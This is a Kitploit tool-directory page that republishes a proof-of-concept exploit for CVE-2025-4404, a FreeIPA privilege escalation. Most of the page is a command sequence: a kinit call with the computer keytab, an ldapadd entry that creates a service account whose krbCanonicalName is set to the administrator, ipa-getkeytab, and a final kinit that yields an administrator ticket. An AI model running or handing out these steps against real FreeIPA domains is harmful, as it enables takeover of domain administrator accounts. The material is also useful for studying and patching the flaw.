Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-4404-POC — POC for CVE-2025-4404 | Kitploit
Tools/GitHubGitHub/im10n/cve-2025-4404-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingAuthentication
GitHubim10n/cve-2025-4404-poc

CVE-2025-4404-POC

POC for CVE-2025-4404

View Repository
61 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-4404 POC

POC for CVE-2025-4404

If you have a domain computer account (host/pc1.[email protected]), then you can add the service by default. And you can set krbPrincipalName and krbCanonicalName. By default, the krbCanonicalName attribute value is missing for the FreeIPA 4.12.4 administrator account. You can request a Kerberos ticket with the value krbPrincipalName, but the ticket will contain the value krbCanonicalName.

Let's go

  1. First, we will request a ticket on behalf of the computer account: $ kinit host/[email protected] -k -t /etc/krb5.keytab

  2. Add to LDAP service account:

root@kitploit:~
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
  1. Request keytab
root@kitploit:~
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
  1. Request ticket $ kinit --no-request-pac -k -t ./test.keytab test/[email protected]

PWN!!!

You can check ticket by: ldapwhoami -H ldap://dc1.test.local

Download Tool